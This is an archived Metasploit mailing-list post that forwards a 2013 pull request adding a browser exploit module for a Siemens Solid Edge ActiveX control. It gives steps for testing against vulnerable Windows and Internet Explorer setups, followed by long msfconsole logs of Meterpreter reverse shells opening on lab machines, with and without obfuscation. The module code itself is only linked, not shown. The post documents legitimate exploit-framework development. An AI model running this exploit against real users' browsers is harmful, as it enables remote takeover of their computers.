Home page logo
/

metasploit logo Metasploit mailing list archives

Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444)
From: Tod Beardsley <todb () metasploit com>
Date: Tue, 1 Oct 2013 12:12:50 -0500

Best exploit pull request ever. Description of, pointer to, and help
offered with, vulnerable software installation, verification steps, and
screens of alternative exploit scenarios in action.

Thanks Juan! I'll want to work this into the documentation on "How to PR
against Metasploit" some day soon.


---------- Forwarded message ----------
From: Juan Vazquez <notifications () github com>
Date: Tue, Oct 1, 2013 at 11:52 AM
Subject: [metasploit-framework] Add module for OSVDB 93696 (#2444)
To: rapid7/metasploit-framework <metasploit-framework () noreply github com>


From the original advisory the software can be located:

http://www.exploit-db.com/exploits/25712/

software description: http://en.wikipedia.org/wiki/Solid_Edge
vendor site: http://www.siemens.com/entry/cc/en/
download url:
http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm
file tested: SolidEdgeV104ENGLISH_32Bit.exe

Downloaded some time ago, don't know if the installer is available still.
email me if you need the installer and it isn't available on the vendor
site anymore.

In order to test

   -  Install as much combinations as you would like to test of Windows
   XPSP3, Vista, 7SP1 / IE6-IE9 / SolidEdgeV104ENGLISH_32Bit.exe
   -  Verify versions of the targeted components: Jutil.dll 104.0.0.82 and
   SEListCtrlX 104.0.0.82
   -  Start msfconsole, select the module and run the exploit
   -  In the browser, go to the link provided by the module. It should
   provide shell. It is using Heap Spray so expect some fails from time to
   time. But the module should be reliable enough.
   - [] If you would like to verify javascript OBFUSCATION for the heap
   spray "set OBFUSCATE true" on the msfconsole once the exploit has been
   selected, before exploit.

Testing examples (IE6 to IE9 on XP SP3 and 7 SP1) :

*IE6 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 6 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:49707)
at 2013-10-01 10:06:17 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:49707) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1692)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3564
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 1 closed.  Reason: User exit

*IE 7 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Requesting: /56sraXTibJtdt
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 7 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:49921)
at 2013-10-01 10:16:26 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:49921) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1056)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3664
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 3 closed.  Reason: User exit



   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Target selected
as: IE 7 on Windows XP SP3
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Using payload
without ROP...
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 6 opened (172.16.240.1:4444 ->
172.16.240.1:50605) at 2013-10-01 11:40:20 -0500
[*] Session ID 6 (172.16.240.1:4444 -> 172.16.240.1:50605) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1340)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2440
[+] Successfully migrated to process


*IE 8 / Windows XP SP3*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /CyzchAko9Lj0
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows XP SP3
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 4 opened (10.6.0.165:4444 -> 10.6.0.165:50169)
at 2013-10-01 10:56:24 -0500
[*] Session ID 4 (10.6.0.165:4444 -> 10.6.0.165:50169) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1764

msf exploit(siemens_solid_edge_selistctrlx) > sessi[+] Successfully
migrated to process
ons -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 4 closed.  Reason: User exit


   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) >
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows XP SP3
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Using msvcrt ROP
[*] 172.16.240.1     siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.1
[*] Meterpreter session 5 opened (172.16.240.1:4444 ->
172.16.240.1:50596) at 2013-10-01 11:36:57 -0500
[*] Session ID 5 (172.16.240.1:4444 -> 172.16.240.1:50596) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2960)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3400
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.240.1 - Meterpreter session 5 closed.  Reason: User exit


*IE8 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /QGQFAoQKQPfO
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows 7
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50519)
at 2013-10-01 11:21:05 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:50519) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3888)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1000

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getui[+] Successfully migrated to process
d
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.140 - Meterpreter session 1 closed.  Reason: User exit


   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444
[*] Using URL: http://0.0.0.0:8080/Bqg4d70LeyFC
[*]  Local IP: http://10.6.0.165:8080/Bqg4d70LeyFC
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) > [*] 10.6.0.165
siemens_solid_edge_selistctrlx - Requesting: /Bqg4d70LeyFC
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Target selected
as: IE 8 on Windows 7
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 10.6.0.165       siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50583)
at 2013-10-01 11:29:29 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:50583) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2416)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 156
[+] Successfully migrated to process


*IE9 / Windows 7 SP1*

msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142
siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Requesting: /y1qz89a
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 3 opened (172.16.240.1:4444 ->
172.16.240.142:49159) at 2013-10-01 11:32:21 -0500
[*] Session ID 3 (172.16.240.1:4444 -> 172.16.240.142:49159)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3200)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3700
[+] Successfully migrated to process

msf exploit(siemens_solid_edge_selistctrlx) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.240.142 - Meterpreter session 3 closed.  Reason: User exit



   - with obfuscation

msf exploit(siemens_solid_edge_selistctrlx) > set OBFUSCATE true
OBFUSCATE => true
msf exploit(siemens_solid_edge_selistctrlx) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.240.1:4444
[*] Using URL: http://172.16.240.1:8080/581APDrO
[*] Server started.
msf exploit(siemens_solid_edge_selistctrlx) > [*] 172.16.240.142
siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Requesting: /581APDrO
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Target selected
as: IE 9 on Windows 7
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Using JUtil ROP
built dynamically...
[*] 172.16.240.142   siemens_solid_edge_selistctrlx - Sending HTML...
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 4 opened (172.16.240.1:4444 ->
172.16.240.142:49162) at 2013-10-01 11:34:18 -0500
[*] Session ID 4 (172.16.240.1:4444 -> 172.16.240.142:49162)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (604)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3188
[+] Successfully migrated to process


------------------------------
You can merge this Pull Request by running

  git pull https://github.com/jvazquez-r7/metasploit-framework osvdb_93696

Or view, comment on, or merge it at:

  https://github.com/rapid7/metasploit-framework/pull/2444
Commit Summary

   - Add module for OSVDB 93696

File Changes

   - *A* 
modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb<https://github.com/rapid7/metasploit-framework/pull/2444/files#diff-0>(500)

Patch Links:

   - https://github.com/rapid7/metasploit-framework/pull/2444.patch
   - https://github.com/rapid7/metasploit-framework/pull/2444.diff
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
  • Fwd: [metasploit-framework] Add module for OSVDB 93696 (#2444) Tod Beardsley (Oct 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]